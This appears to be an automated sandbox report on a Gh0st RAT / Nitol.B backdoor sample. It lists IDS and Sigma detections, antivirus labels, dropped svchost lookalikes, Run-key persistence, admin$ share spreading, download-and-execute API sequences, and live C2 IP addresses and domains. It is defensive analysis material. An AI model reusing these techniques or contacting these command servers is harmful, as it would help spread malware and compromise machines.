Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\XXXXXX05CA35CC\svchsot.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Temp\server.exe, ProcessId: 7472, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\XXXXXX05CA35CC

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\system32\033726\svchost.exe" , CommandLine: "C:\Windows\system32\033726\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\033726\svchost.exe, NewProcessName: C:\Windows\SysWOW64\033726\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\033726\svchost.exe, ParentCommandLine: "C:\Windows\temp\server.exe" , ParentImage: C:\Windows\Temp\server.exe, ParentProcessId: 7472, ParentProcessName: server.exe, ProcessCommandLine: "C:\Windows\system32\033726\svchost.exe" , ProcessId: 7844, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Backdoor family PCRat/Gh0st CnC traffic

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T09:01:27.972349+0100	2016922	1	Malware Command and Control Activity Detected	192.168.2.9	49707	120.48.34.233	8000	TCP

ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T09:01:27.972349+0100	2013214	1	Malware Command and Control Activity Detected	192.168.2.9	49707	120.48.34.233	8000	TCP

ET MALWARE [ANY.RUN] Win32/Gh0stRat Keep-Alive

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T09:01:28.949435+0100	2048478	1	A Network Trojan was detected	120.48.34.233	8000	192.168.2.9	49707	TCP

ET MALWARE [PTsecurity] Botnet Nitol.B Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T09:01:28.392042+0100	2025135	1	Malware Command and Control Activity Detected	192.168.2.9	49713	120.48.34.233	8080	TCP
2024-12-23T09:01:30.624146+0100	2025135	1	Malware Command and Control Activity Detected	192.168.2.9	49720	8.7.198.46	8090	TCP
2024-12-23T09:01:50.831677+0100	2025135	1	Malware Command and Control Activity Detected	192.168.2.9	49767	120.48.34.233	8080	TCP
2024-12-23T09:01:53.205437+0100	2025135	1	Malware Command and Control Activity Detected	192.168.2.9	49774	8.7.198.46	8090	TCP
2024-12-23T09:02:13.473112+0100	2025135	1	Malware Command and Control Activity Detected	192.168.2.9	49814	120.48.34.233	8080	TCP
2024-12-23T09:02:15.979966+0100	2025135	1	Malware Command and Control Activity Detected	192.168.2.9	49820	8.7.198.46	8090	TCP
2024-12-23T09:02:35.999010+0100	2025135	1	Malware Command and Control Activity Detected	192.168.2.9	49857	120.48.34.233	8080	TCP
2024-12-23T09:02:39.320654+0100	2025135	1	Malware Command and Control Activity Detected	192.168.2.9	49865	46.82.174.69	8090	TCP
2024-12-23T09:02:58.388861+0100	2025135	1	Malware Command and Control Activity Detected	192.168.2.9	49901	120.48.34.233	8080	TCP
2024-12-23T09:03:01.971236+0100	2025135	1	Malware Command and Control Activity Detected	192.168.2.9	49912	46.82.174.69	8090	TCP
2024-12-23T09:03:21.114463+0100	2025135	1	Malware Command and Control Activity Detected	192.168.2.9	49945	120.48.34.233	8080	TCP
2024-12-23T09:03:27.358663+0100	2025135	1	Malware Command and Control Activity Detected	192.168.2.9	49956	46.82.174.69	8090	TCP
2024-12-23T09:03:43.593518+0100	2025135	1	Malware Command and Control Activity Detected	192.168.2.9	49989	120.48.34.233	8080	TCP

ETPRO MALWARE Backdoor family PCRat/Gh0st CnC Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T09:01:28.949435+0100	2808814	1	Malware Command and Control Activity Detected	120.48.34.233	8000	192.168.2.9	49707	TCP

ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-23T09:01:20.628261+0100	2807550	1	Malware Command and Control Activity Detected	192.168.2.9	49767	120.48.34.233	8080	TCP
2024-12-23T09:01:20.628261+0100	2807550	1	Malware Command and Control Activity Detected	192.168.2.9	49857	120.48.34.233	8080	TCP
2024-12-23T09:01:20.628261+0100	2807550	1	Malware Command and Control Activity Detected	192.168.2.9	49901	120.48.34.233	8080	TCP
2024-12-23T09:01:20.628261+0100	2807550	1	Malware Command and Control Activity Detected	192.168.2.9	49956	46.82.174.69	8090	TCP
2024-12-23T09:01:20.628261+0100	2807550	1	Malware Command and Control Activity Detected	192.168.2.9	49865	46.82.174.69	8090	TCP
2024-12-23T09:01:20.628261+0100	2807550	1	Malware Command and Control Activity Detected	192.168.2.9	49713	120.48.34.233	8080	TCP
2024-12-23T09:01:20.628261+0100	2807550	1	Malware Command and Control Activity Detected	192.168.2.9	49820	8.7.198.46	8090	TCP
2024-12-23T09:01:20.628261+0100	2807550	1	Malware Command and Control Activity Detected	192.168.2.9	49989	120.48.34.233	8080	TCP
2024-12-23T09:01:20.628261+0100	2807550	1	Malware Command and Control Activity Detected	192.168.2.9	49912	46.82.174.69	8090	TCP
2024-12-23T09:01:20.628261+0100	2807550	1	Malware Command and Control Activity Detected	192.168.2.9	49720	8.7.198.46	8090	TCP
2024-12-23T09:01:20.628261+0100	2807550	1	Malware Command and Control Activity Detected	192.168.2.9	49774	8.7.198.46	8090	TCP
2024-12-23T09:01:20.628261+0100	2807550	1	Malware Command and Control Activity Detected	192.168.2.9	49945	120.48.34.233	8080	TCP
2024-12-23T09:01:20.628261+0100	2807550	1	Malware Command and Control Activity Detected	192.168.2.9	49814	120.48.34.233	8080	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: G3izWAY3Fa.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Windows\SysWOW64\033726\svchost.exe	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\SysWOW64\034031\svchost.exe	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\SysWOW64\033726\RCX773C.tmp	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\Temp\server.exe	Avira: detection malicious, Label: BDS/Zegost.birna
Source: C:\Windows\Temp\v5.exe	Avira: detection malicious, Label: TR/Staser.apzjs
Source: C:\Windows\SysWOW64\034031\RCX8B31.tmp	Avira: detection malicious, Label: BDS/Zegost.birna

Multi AV Scanner detection for dropped file

Source: C:\Windows\SysWOW64\033726\svchost.exe	ReversingLabs: Detection: 95%
Source: C:\Windows\Temp\server.exe	ReversingLabs: Detection: 95%
Source: C:\Windows\Temp\v5.exe	ReversingLabs: Detection: 100%
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	ReversingLabs: Detection: 95%

Multi AV Scanner detection for submitted file

Source: G3izWAY3Fa.exe	Virustotal: Detection: 70%			Perma Link
Source: G3izWAY3Fa.exe	ReversingLabs: Detection: 86%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.1% probability

Machine Learning detection for dropped file

Source: C:\Windows\SysWOW64\033726\svchost.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\034031\svchost.exe	Joe Sandbox ML: detected
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Joe Sandbox ML: detected
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\033726\RCX773C.tmp	Joe Sandbox ML: detected
Source: C:\Windows\Temp\server.exe	Joe Sandbox ML: detected
Source: C:\Windows\Temp\v5.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\034031\RCX8B31.tmp	Joe Sandbox ML: detected

Source: G3izWAY3Fa.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:	Binary string: f:\SystemTool Eng 19\SystemTool Eng 16\SystemTool Eng 52\SystemTool\Release\SystemTool.pdb source: G3izWAY3Fa.exe, 00000000.00000002.1327850381.0000000002851000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe, 00000005.00000000.1324754830.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe.0.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdbEG source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb4 source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\ntkrnlmp.pdb source: .exe, 00000005.00000002.2705674625.00000000024E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: -00c04fd929dbmp\\Symbols\winload_prod.pdbrord32_super_sbx\Adobe\Acrob source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp

Spreading

Contains functionality to enumerate network shares of other devices

Source: C:\Windows\Temp\v5.exe

Code function: 4_2_00402AD0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,lstrcmp,sprintf,sprintf,sprintf,WNetAddConnection2A,Sleep,memset,sprintf,CopyFileA,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,GetLocalTime,memset,sprintf,WinExec,Sleep, \\%s\admin$\g1fd.exe

4_2_00402AD0

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405302
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_0040263E FindFirstFileA,	0_2_0040263E
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_00405CD8 FindFirstFileA,FindClose,	0_2_00405CD8
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,	3_2_10001A20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,	3_2_100014B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,	3_2_10008B50
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	3_2_10008520
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008E40 FindFirstFileA,FindClose,FindClose,	3_2_10008E40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	3_2_100086F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,	3_2_10008F00
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0045B051 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,	5_2_0045B051
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00405260 FindFirstFileA,GetFileAttributesA,SetFileAttributesA,RemoveDirectoryA,DeleteFileA,FindNextFileA,FindClose,	5_2_00405260
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00439D40 #17,__time32,FindFirstFileA,DeleteFileA,	5_2_00439D40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,	8_2_10001A20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,	8_2_10008B50
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,	8_2_100014B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	8_2_10008520
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008E40 FindFirstFileA,FindClose,FindClose,	8_2_10008E40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	8_2_100086F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,	8_2_10008F00

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000AA30 wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,wsprintfA,GetTickCount,wsprintfA,GetComputerNameA,GetUserNameA,wsprintfA,GetLogicalDriveStringsA,lstrlen,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,GetDiskFreeSpaceExA,lstrlen,wsprintfA,wsprintfA,GlobalMemoryStatusEx,GlobalMemoryStatusEx,wsprintfA,GlobalMemoryStatusEx,wsprintfA,wsprintfA,lstrlen,wsprintfA,_strrev,_strrev,_strrev,_strrev,wsprintfA,wsprintfA,

3_2_1000AA30

Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2013214 - Severity 1 - ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server : 192.168.2.9:49707 -> 120.48.34.233:8000
Source: Network traffic	Suricata IDS: 2016922 - Severity 1 - ET MALWARE Backdoor family PCRat/Gh0st CnC traffic : 192.168.2.9:49707 -> 120.48.34.233:8000
Source: Network traffic	Suricata IDS: 2048478 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Gh0stRat Keep-Alive : 120.48.34.233:8000 -> 192.168.2.9:49707
Source: Network traffic	Suricata IDS: 2808814 - Severity 1 - ETPRO MALWARE Backdoor family PCRat/Gh0st CnC Response : 120.48.34.233:8000 -> 192.168.2.9:49707
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49720 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49713 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49774 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49767 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49814 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49820 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49857 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49865 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49901 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49912 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49945 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49956 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49989 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49767 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49857 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49901 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49956 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49865 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49713 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49820 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49989 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49912 -> 46.82.174.69:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49720 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49774 -> 8.7.198.46:8090
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49945 -> 120.48.34.233:8080
Source: Network traffic	Suricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49814 -> 120.48.34.233:8080

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000B6F0 Sleep,wsprintfA,GetTickCount,GetTickCount,wsprintfA,URLDownloadToFileA,GetTempPathA,fopen,fscanf,fscanf,GetTickCount,wsprintfA,GetTickCount,wsprintfA,URLDownloadToFileA,ShellExecuteA,fscanf,fclose,DeleteFileA,Sleep,

3_2_1000B6F0

Source: global traffic	TCP traffic: 192.168.2.9:49707 -> 120.48.34.233:8000
Source: global traffic	TCP traffic: 192.168.2.9:49720 -> 8.7.198.46:8090
Source: global traffic	TCP traffic: 192.168.2.9:49865 -> 46.82.174.69:8090

Source: Joe Sandbox View	ASN Name: CHINANET-BACKBONENo31Jin-rongStreetCN CHINANET-BACKBONENo31Jin-rongStreetCN
Source: Joe Sandbox View	ASN Name: SPRINGSUS SPRINGSUS
Source: Joe Sandbox View	ASN Name: DTAGInternetserviceprovideroperationsDE DTAGInternetserviceprovideroperationsDE

Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	TCP traffic detected without corresponding DNS query: 120.48.34.233
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_004036C6 select,__WSAFDIsSet,recv,

2_2_004036C6

Source: global traffic	DNS traffic detected: DNS query: chinagov.8800.org
Source: global traffic	DNS traffic detected: DNS query: www.wk1888.com
Source: global traffic	DNS traffic detected: DNS query: www.af0575.com
Source: global traffic	DNS traffic detected: DNS query: www.fz0575.com

Source: v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1
Source: v5.exe, 00000004.00000003.2558799404.0000000000690000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/
Source: v5.exe, 00000004.00000003.1494703239.00000000006B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/1
Source: v5.exe, 00000004.00000003.2237287822.0000000000690000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2013456576.0000000000691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/VZ
Source: v5.exe, 00000004.00000003.1494703239.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/b6
Source: v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1/h
Source: v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1:80/
Source: v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1:80/4
Source: v5.exe, 00000004.00000003.1561640538.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1:80/6to4
Source: v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.168.2.1:80/_
